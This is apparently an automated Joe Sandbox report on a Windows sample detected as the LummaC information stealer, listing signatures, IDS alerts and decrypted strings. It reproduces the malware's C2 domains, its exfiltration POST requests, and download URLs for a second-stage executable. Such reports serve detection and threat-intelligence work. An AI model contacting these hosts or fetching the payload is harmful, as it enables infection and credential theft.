Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zLP3oiwG1g.exe

Overview

General Information

Sample name:zLP3oiwG1g.exe
renamed because original name is a hash value
Original sample name:ad848f9eed40c0533c28f2c521395df8.exe
Analysis ID:1579725
MD5:ad848f9eed40c0533c28f2c521395df8
SHA1:4033ed1deb63922a6f73a35204db425fe0d3b559
SHA256:464199a09a215759b285df6462e2cbcfcecf601844c666da6e9de258a0a5d4e9
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • zLP3oiwG1g.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\zLP3oiwG1g.exe" MD5: AD848F9EED40C0533C28F2C521395DF8)
    • WerFault.exe (PID: 6208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7300 -s 2028 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["tentabatte.lat", "slipperyloo.lat", "observerfry.lat", "curverpluch.lat", "bashfulacid.lat", "talkynicer.lat", "wordyfindy.lat", "shapestickyr.lat", "manyrestro.lat"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: zLP3oiwG1g.exe PID: 7300JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: zLP3oiwG1g.exe PID: 7300JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: zLP3oiwG1g.exe PID: 7300JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            Process Memory Space: zLP3oiwG1g.exe PID: 7300JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:08:36.728457+010020283713Unknown Traffic192.168.2.1049713104.21.36.201443TCP
                2024-12-23T08:08:38.709148+010020283713Unknown Traffic192.168.2.1049719104.21.36.201443TCP
                2024-12-23T08:08:41.383464+010020283713Unknown Traffic192.168.2.1049725104.21.36.201443TCP
                2024-12-23T08:08:44.094130+010020283713Unknown Traffic192.168.2.1049731104.21.36.201443TCP
                2024-12-23T08:08:46.420577+010020283713Unknown Traffic192.168.2.1049737104.21.36.201443TCP
                2024-12-23T08:08:49.010535+010020283713Unknown Traffic192.168.2.1049743104.21.36.201443TCP
                2024-12-23T08:08:51.511498+010020283713Unknown Traffic192.168.2.1049751104.21.36.201443TCP
                2024-12-23T08:08:56.654674+010020283713Unknown Traffic192.168.2.1049768172.67.199.72443TCP
                2024-12-23T08:08:59.223387+010020283713Unknown Traffic192.168.2.1049774185.166.143.48443TCP
                2024-12-23T08:09:01.563690+010020283713Unknown Traffic192.168.2.104978052.217.67.100443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:08:37.462740+010020546531A Network Trojan was detected192.168.2.1049713104.21.36.201443TCP
                2024-12-23T08:08:39.480311+010020546531A Network Trojan was detected192.168.2.1049719104.21.36.201443TCP
                2024-12-23T08:08:57.453439+010020546531A Network Trojan was detected192.168.2.1049768172.67.199.72443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:08:37.462740+010020498361A Network Trojan was detected192.168.2.1049713104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:08:39.480311+010020498121A Network Trojan was detected192.168.2.1049719104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:08:51.521970+010020480941Malware Command and Control Activity Detected192.168.2.1049751104.21.36.201443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: zLP3oiwG1g.exeAvira: detected
                Source: zLP3oiwG1g.exe.7300.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["tentabatte.lat", "slipperyloo.lat", "observerfry.lat", "curverpluch.lat", "bashfulacid.lat", "talkynicer.lat", "wordyfindy.lat", "shapestickyr.lat", "manyrestro.lat"], "Build id": "LOGS11--LiveTraffic"}
                Source: zLP3oiwG1g.exeVirustotal: Detection: 57%Perma Link
                Source: zLP3oiwG1g.exeReversingLabs: Detection: 60%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: zLP3oiwG1g.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: bashfulacid.lat
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: tentabatte.lat
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: curverpluch.lat
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: talkynicer.lat
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: shapestickyr.lat
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: manyrestro.lat
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: slipperyloo.lat
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: wordyfindy.lat
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: observerfry.lat
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmpString decryptor: LOGS11--LiveTraffic
                Source: zLP3oiwG1g.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.10:49768 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.10:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.217.67.100:443 -> 192.168.2.10:49780 version: TLS 1.2
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49713 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49713 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49768 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49751 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49719 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49719 -> 104.21.36.201:443
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Malware configuration extractorURLs: observerfry.lat
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49737 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49743 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49731 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49719 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49774 -> 185.166.143.48:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49768 -> 172.67.199.72:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49713 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49751 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49725 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49780 -> 52.217.67.100:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7KS519323WMYJSPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12835Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F9JM2P9ZQQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15032Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=W15LETL8XXHBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20406Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DDMTGP5F02YWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1227Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=15G7M9X12XXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552953Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: observerfry.lat
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIFBW6TYB&Signature=PelXt66tJz%2FulrB0cB0%2BaL7%2Bi5E%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQD%2BsOmmZbJoeqQMRgcbUIKewsPYW2aBXNNdnqSZnOjDFwIgR8XEHN13jTNswyI0HHU0LSuyGD%2FTMiS45XjOxzfx2bUqsAII0P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDKLERm7AyKJmGnsaryqEAiz2RQWxEcCBLMIfVp3H4PSzeOX5Dz20ShaLz%2BgE9TIlAJRJj3b2E09svKzFkLddqGwYqC2K%2FKIH%2B43EpJ156iF0t0YnErOxg3PyYWT2PSMugnEx4xgVbJpkrwOS%2BaXe%2FSsC4UOf%2F83UoqmwNPRhKyzztbcDpxLcWerZy9Q6aovVLfMedeL2%2BzfXvbpi8S9915xhF0Cpozy3i0jpnDfou%2FWMrbGZX8d8kbOTHT2AOnqFdwajWkRe0yZY7VqHnS4UnUUU2gtvmzbAh%2B9Byjxps3Oa32XIPpDohq%2Fsd63Twd%2FTpUBNqNyZ3%2BxCnHgqoVCvvdq8kFyXYiW9CTBL2KWz0BWyfxXEMIaYpLsGOp0BYb7jWXl2rvZ6kkWiTN4Lg4p1xTsXw8YInPWUnYT2zjLbcrffJNmSPBWt8S40YM7x5zFblDt5Ez56YqzuxoQvJUGtRwLyEvmWXdiFc4qnFdZ23f1PLTAyj9HhgDgDv4DamxGztbRL8AaMRtwH4RffwZACiFAqouZ6XFzfcohb2gfVkHH44WWfa%2BbgFPu5g%2BOCDe%2B7GJ3m%2BCwi76mw1w%3D%3D&Expires=1734939406 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIFBW6TYB&Signature=PelXt66tJz%2FulrB0cB0%2BaL7%2Bi5E%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQD%2BsOmmZbJoeqQMRgcbUIKewsPYW2aBXNNdnqSZnOjDFwIgR8XEHN13jTNswyI0HHU0LSuyGD%2FTMiS45XjOxzfx2bUqsAII0P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDKLERm7AyKJmGnsaryqEAiz2RQWxEcCBLMIfVp3H4PSzeOX5Dz20ShaLz%2BgE9TIlAJRJj3b2E09svKzFkLddqGwYqC2K%2FKIH%2B43EpJ156iF0t0YnErOxg3PyYWT2PSMugnEx4xgVbJpkrwOS%2BaXe%2FSsC4UOf%2F83UoqmwNPRhKyzztbcDpxLcWerZy9Q6aovVLfMedeL2%2BzfXvbpi8S9915xhF0Cpozy3i0jpnDfou%2FWMrbGZX8d8kbOTHT2AOnqFdwajWkRe0yZY7VqHnS4UnUUU2gtvmzbAh%2B9Byjxps3Oa32XIPpDohq%2Fsd63Twd%2FTpUBNqNyZ3%2BxCnHgqoVCvvdq8kFyXYiW9CTBL2KWz0BWyfxXEMIaYpLsGOp0BYb7jWXl2rvZ6kkWiTN4Lg4p1xTsXw8YInPWUnYT2zjLbcrffJNmSPBWt8S40YM7x5zFblDt5Ez56YqzuxoQvJUGtRwLyEvmWXdiFc4qnFdZ23f1PLTAyj9HhgDgDv4DamxGztbRL8AaMRtwH4RffwZACiFAqouZ6XFzfcohb2gfVkHH44WWfa%2BbgFPu5g%2BOCDe%2B7GJ3m%2BCwi76mw1w%3D%3D&Expires=1734939406 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: global trafficDNS traffic detected: DNS query: observerfry.lat
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051A5000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: zLP3oiwG1g.exe, 00000000.00000003.1543300122.0000000000356000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1446181758.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1484141788.0000000000353000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1467082412.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: zLP3oiwG1g.exe, 00000000.00000003.1618402977.00000000051BD000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893736231.0000000005929000.00000002.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051A5000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051A5000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
